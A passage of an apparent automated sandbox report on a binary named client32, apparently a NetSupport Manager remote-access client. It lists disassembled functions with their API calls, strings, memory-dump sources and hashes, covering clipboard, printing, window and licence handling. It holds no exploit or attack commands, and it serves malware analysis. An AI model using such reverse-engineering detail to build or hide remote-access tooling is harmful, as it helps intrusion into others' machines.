                                                                              • Opcode Fuzzy Hash: b43d23eca00fc98279872c74fba5cd571594f629bf43370f3fb923d7744f4274
                                                                              • Instruction Fuzzy Hash: 5A216A34F00319ABF7109BB1ED84FDAFBA89F89799F000125ED44A7388DAB5D900C756
                                                                              Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                              • GetStockObject.GDI32(00000007), ref: 11003089
                                                                              • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                              • SelectObject.GDI32(?,?), ref: 110030A7
                                                                              • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                              • GetSysColor.USER32(00000004), ref: 110030EB
                                                                              • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                              • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                              • SelectObject.GDI32(?,?), ref: 1100311E
                                                                              • SelectObject.GDI32(?,?), ref: 11003128
                                                                              • DeleteObject.GDI32(?), ref: 1100312E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                              • String ID:
                                                                              • API String ID: 4121194973-0
                                                                              • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                              • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                              • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                              • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                              Function 110EC080 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$_memmove
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$sending %d pending packets to id=%d$sending %d pending64 packets to id=%d
                                                                              • API String ID: 2795716529-56098872
                                                                              • Opcode ID: b831a2aef7adc0e78416c8d07ea286e2aa2a92496e215c766d8791fe199a835f
                                                                              • Instruction ID: d8a14ece9aebe5fc759910a3ef787c23c29568686b565e81e139e8b64e86eac7
                                                                              • Opcode Fuzzy Hash: b831a2aef7adc0e78416c8d07ea286e2aa2a92496e215c766d8791fe199a835f
                                                                              • Instruction Fuzzy Hash: B071BC78B016069FD714CFA9DD84EAAF7F5BF89304B1841A8E85697740EB31F901CB60
                                                                              Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CountClipboardFormats.USER32 ref: 11033091
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                              • GetLastError.KERNEL32 ref: 110331BF
                                                                              • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                              • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                              • API String ID: 3210887762-597690070
                                                                              • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                              • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                              Function 110CC170 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 143threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetPropA.USER32(?,AB86ACF8,?), ref: 110CC1FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110CC20F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetPropA.USER32(?), ref: 110CC241
                                                                              • wsprintfA.USER32 ref: 110CC26B
                                                                              • RemovePropA.USER32(?,00000110), ref: 110CC2B2
                                                                              • DestroyWindow.USER32(?), ref: 110CC2EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Prop$wsprintf$CurrentDestroyErrorExitLastMessageProcessRemoveThreadWindow
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$cp=%x, attached=%x, msg=x%x, wP=x%x, lP=x%x$m_aProp$p->m_attached == NULL
                                                                              • API String ID: 812309727-1527154164
                                                                              • Opcode ID: 3e5ce05be63e39b54263a7620cd87c041d38ce16679996f6af051447c9b9cf9e
                                                                              • Instruction ID: 7ee6c1d1fbb90971631718b64b6a11245d543e6534e72765267dc52c4282e58d
                                                                              • Opcode Fuzzy Hash: 3e5ce05be63e39b54263a7620cd87c041d38ce16679996f6af051447c9b9cf9e
                                                                              • Instruction Fuzzy Hash: 14415C76A00215ABD304CF61EC91FEEF7A8FB84718F004669FD1687640DB34A954DBD0
                                                                              Function 110660A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset_strncat_strncpy$_calloc
                                                                              • String ID: Drivers$PrintCapture$Printer
                                                                              • API String ID: 3453565913-1525524346
                                                                              • Opcode ID: 8e53ec29127167110db8139749ed4a57339a75ab7dc11517aaa3ebc3082e1d9b
                                                                              • Instruction ID: e5966f23d60a821bc949eb904edc655292dfad0084cacb2037a4aacc8ed38eb6
                                                                              • Opcode Fuzzy Hash: 8e53ec29127167110db8139749ed4a57339a75ab7dc11517aaa3ebc3082e1d9b
                                                                              • Instruction Fuzzy Hash: B441E675B00255AFE711DB68DC14FEBBBED9F45304F0841E4E9489B282EAB1AB14C791
                                                                              Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                              • _memset.LIBCMT ref: 1101F2D8
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                              • _free.LIBCMT ref: 1101F305
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1101F30E
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                              • String ID: $0$UndoOwnerDraw
                                                                              • API String ID: 4094458939-790594647
                                                                              • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                              • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                              Function 11046574 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110466F6
                                                                              • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11046754
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$FreeString
                                                                              • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                              • API String ID: 2011556836-2400621309
                                                                              • Opcode ID: 69f61a2baa9fb0766ad057bd2a1d681a7a704c1839ba695c1c432c0a31945c9e
                                                                              • Instruction ID: 526fbaba51a485f2dd793f9eaee2f9ce6c1461205b491c382c0c72529cc68b9e
                                                                              • Opcode Fuzzy Hash: 69f61a2baa9fb0766ad057bd2a1d681a7a704c1839ba695c1c432c0a31945c9e
                                                                              • Instruction Fuzzy Hash: 16814075A0061A9BDB24DF54CD90BEAB3B5EF88714F1045E8E90997A40FB70AE41DF90
                                                                              Function 110C01B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 179windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110C01F2
                                                                              • GetClassNameA.USER32(?,?,00000040), ref: 110C0228
                                                                              • TranslateAcceleratorA.USER32(?,?,?), ref: 110C032B
                                                                              • TranslateMessage.USER32(?), ref: 110C0339
                                                                              • DispatchMessageA.USER32(?), ref: 110C0343
                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110C0363
                                                                              Strings
                                                                              • HasListener(), xrefs: 110C0286
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h, xrefs: 110C0281
                                                                              • Internet Explorer_Server, xrefs: 110C022E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Translate$AcceleratorClassDispatchName
                                                                              • String ID: HasListener()$Internet Explorer_Server$e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h
                                                                              • API String ID: 2790452592-1312810806
                                                                              • Opcode ID: a299c0a341d7359eb60e01caba3f66fa6322f248e60fac38c817ccec7eac8837
                                                                              • Instruction ID: 936b2eed32dfe800ad467d363562b9c3f6b2b04524ed739118aa387b7ad975e3
                                                                              • Opcode Fuzzy Hash: a299c0a341d7359eb60e01caba3f66fa6322f248e60fac38c817ccec7eac8837
                                                                              • Instruction Fuzzy Hash: 17519179E002599FCB04DFE9C8C0EAEB7BAFB89708B1085ADE5159B254E730A944CF50
                                                                              Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110513F9
                                                                              • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle__wcstoi64_memset
                                                                              • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                              • API String ID: 510078033-311296318
                                                                              • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                              • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                              Function 1105A510 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164synchronizationtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,AB86ACF8,?,?), ref: 1105A559
                                                                              • EnterCriticalSection.KERNEL32(?,?,?), ref: 1105A5BE
                                                                              • timeGetTime.WINMM(?,?), ref: 1105A5EC
                                                                              • GetTickCount.KERNEL32 ref: 1105A626
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 1105A69A
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 1105A6B4
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 1105A6D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                              • String ID: _License$maxslaves
                                                                              • API String ID: 3724810986-253336860
                                                                              • Opcode ID: 47acf8a46b654237af2362819ba01079215634d33959dcd664a85182bc47307d
                                                                              • Instruction ID: 218b07b8e86cb1b4b212646cc2ee7e6510c65d0581f7dc775b968cb85b8a58a4
